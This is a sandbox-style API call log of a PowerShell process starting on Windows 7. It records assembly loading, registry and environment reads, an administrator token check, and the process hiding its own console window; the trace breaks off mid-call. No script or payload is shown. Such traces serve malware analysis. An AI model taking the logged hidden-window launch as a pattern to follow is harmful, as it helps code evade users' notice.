[0074.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xce1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0074.282] GetLastError () returned 0x2 [0074.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.445] GetLastError () returned 0xcb [0074.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce298, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.447] GetLastError () returned 0xcb [0074.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.447] GetLastError () returned 0xcb [0074.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.448] GetLastError () returned 0xcb [0074.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0074.481] GetLastError () returned 0xcb [0074.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xce1dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0074.593] GetLastError () returned 0x2 [0074.593] SetErrorMode (uMode=0x1) returned 0x1 [0074.593] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", fInfoLevelId=0x0, lpFileInformation=0xce684 | out: lpFileInformation=0xce684) returned 0 [0074.593] GetLastError () returned 0x2 [0074.593] SetErrorMode (uMode=0x1) returned 0x1 [0075.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce298, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.222] GetLastError () returned 0x0 [0075.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.222] GetLastError () returned 0x0 [0075.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.224] GetLastError () returned 0x0 [0075.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.228] GetLastError () returned 0xcb [0075.233] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.233] GetLastError () returned 0xcb [0075.233] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.234] GetLastError () returned 0xcb [0075.241] CoCreateGuid (in: pguid=0xce764 | out: pguid=0xce764*(Data1=0x369eae3e, Data2=0x172f, Data3=0x414e, Data4=([0]=0x91, [1]=0xd3, [2]=0xde, [3]=0x92, [4]=0xf5, [5]=0x23, [6]=0x62, [7]=0xfa))) returned 0x0 [0075.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.250] GetLastError () returned 0xcb [0075.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.255] GetLastError () returned 0xcb [0075.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.259] GetLastError () returned 0xcb [0075.277] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0075.280] GetLastError () returned 0x0 [0075.283] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xce644 | out: lpConsoleScreenBufferInfo=0xce644) returned 1 [0075.283] GetLastError () returned 0x0 [0075.291] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0075.292] GetLastError () returned 0x0 [0075.292] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xce644 | out: lpConsoleScreenBufferInfo=0xce644) returned 1 [0075.292] GetLastError () returned 0x0 [0075.293] GetVersionExW (in: lpVersionInformation=0x2d16a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2d16a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0075.293] GetLastError () returned 0x0 [0075.296] GetCurrentProcess () returned 0xffffffff [0075.296] GetLastError () returned 0x3f0 [0075.298] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xce654 | out: TokenHandle=0xce654*=0x334) returned 1 [0075.298] GetLastError () returned 0x3f0 [0075.320] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xce6ac | out: TokenInformation=0x0, ReturnLength=0xce6ac) returned 0 [0075.321] GetLastError () returned 0x7a [0075.322] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2a51a0 [0075.322] GetLastError () returned 0x7a [0075.323] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x8, TokenInformation=0x2a51a0, TokenInformationLength=0x4, ReturnLength=0xce6ac | out: TokenInformation=0x2a51a0, ReturnLength=0xce6ac) returned 1 [0075.323] GetLastError () returned 0x7a [0075.327] DuplicateTokenEx (in: hExistingToken=0x334, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xce664 | out: phNewToken=0xce664*=0x32c) returned 1 [0075.327] GetLastError () returned 0x7f [0075.327] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xce6ac | out: TokenInformation=0x0, ReturnLength=0xce6ac) returned 0 [0075.327] GetLastError () returned 0x7a [0075.328] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2a5150 [0075.328] GetLastError () returned 0x7a [0075.328] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x8, TokenInformation=0x2a5150, TokenInformationLength=0x4, ReturnLength=0xce6ac | out: TokenInformation=0x2a5150, ReturnLength=0xce6ac) returned 1 [0075.328] GetLastError () returned 0x7a [0075.329] CheckTokenMembership (in: TokenHandle=0x32c, SidToCheck=0x2af12ec, IsMember=0xce640 | out: IsMember=0xce640) returned 1 [0075.329] GetLastError () returned 0x7a [0075.329] CloseHandle (hObject=0x32c) returned 1 [0075.329] GetLastError () returned 0x7a [0075.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce184, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.330] GetLastError () returned 0x7a [0075.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.330] GetLastError () returned 0x7a [0075.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.330] GetLastError () returned 0x7a [0075.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.330] GetLastError () returned 0x7a [0075.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce184, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.392] GetLastError () returned 0x7a [0075.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.392] GetLastError () returned 0x7a [0075.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.392] GetLastError () returned 0x7a [0075.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce184, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.393] GetLastError () returned 0x7a [0075.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.393] GetLastError () returned 0x7a [0075.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.393] GetLastError () returned 0x7a [0075.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce198, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.394] GetLastError () returned 0x7a [0075.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce148, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.394] GetLastError () returned 0x7a [0075.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce148, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.394] GetLastError () returned 0x7a [0075.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce148, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0075.394] GetLastError () returned 0x7a [0075.490] SetConsoleCtrlHandler (HandlerRoutine=0x292384a, Add=1) returned 1 [0075.490] GetLastError () returned 0x7a [0076.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.038] GetLastError () returned 0xcb [0076.074] GetConsoleWindow () returned 0x10208 [0076.076] ShowWindow (hWnd=0x10208, nCmdShow=0) returned 0 [0076.102] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c [0076.102] GetLastError () returned 0x0 [0076.103] CoCreateGuid (in: pguid=0xce678 | out: pguid=0xce678*(Data1=0x7164d70, Data2=0xd9e4, Data3=0x4b2a, Data4=([0]=0x87, [1]=0x9e, [2]=0xcf, [3]=0xbc, [4]=0xf4, [5]=0xcc, [6]=0x48, [7]=0x74))) returned 0x0 [0076.145] WinSqmIsOptedIn () returned 0x0 [0076.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.147] GetLastError () returned 0xcb [0076.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.152] GetLastError () returned 0xcb [0076.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.153] GetLastError () returned 0xcb [0076.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.156] GetLastError () returned 0xcb [0076.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.157] GetLastError () returned 0xcb [0076.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.177] GetLastError () returned 0xcb [0076.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.177] GetLastError () returned 0xcb [0076.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.178] GetLastError () returned 0xcb [0076.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.250] GetLastError () returned 0x3 [0076.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.250] GetLastError () returned 0x3 [0076.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.250] GetLastError () returned 0x3 [0076.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.250] GetLastError () returned 0x3 [0076.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.250] GetLastError () returned 0x3 [0076.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.250] GetLastError () returned 0x3 [0076.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.251] GetLastError () returned 0x3 [0076.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.251] GetLastError () returned 0x3 [0076.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.252] GetLastError () returned 0x3 [0076.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.252] GetLastError () returned 0x3 [0076.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.252] GetLastError () returned 0x3 [0076.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.252] GetLastError () returned 0x3 [0076.301] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0076.302] GetLastError () returned 0x3 [0076.472] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2d1690, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0076.472] GetLastError () returned 0x3 [0076.472] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xce490 | out: phkResult=0xce490*=0x338) returned 0x0 [0076.472] RegQueryValueExW (in: hKey=0x338, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xce4d4, lpData=0x0, lpcbData=0xce4d0*=0x0 | out: lpType=0xce4d4*=0x2, lpData=0x0, lpcbData=0xce4d0*=0x6c) returned 0x0 [0076.474] RegQueryValueExW (in: hKey=0x338, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xce4d4, lpData=0x2d1690, lpcbData=0xce4d0*=0x6c | out: lpType=0xce4d4*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xce4d0*=0x6c) returned 0x0 [0076.474] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2d1690, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0076.474] GetLastError () returned 0x3 [0076.474] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2d1690, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0076.474] GetLastError () returned 0x3 [0076.475] RegCloseKey (hKey=0x338) returned 0x0 [0076.475] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2d1690, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0076.475] GetLastError () returned 0x3 [0076.476] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xce490 | out: phkResult=0xce490*=0x338) returned 0x0 [0076.476] RegQueryValueExW (in: hKey=0x338, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xce4d4, lpData=0x0, lpcbData=0xce4d0*=0x0 | out: lpType=0xce4d4*=0x0, lpData=0x0, lpcbData=0xce4d0*=0x0) returned 0x2 [0076.477] RegCloseKey (hKey=0x338) returned 0x0 [0076.856] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2d1690 | out: pszPath="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents") returned 0x0 [0076.859] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents", nBufferLength=0x105, lpBuffer=0xcdff8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents", lpFilePart=0x0) returned 0x24 [0076.859] GetLastError () returned 0x3f0 [0076.905] SetEnvironmentVariableW (lpName="PSMODULEPATH", 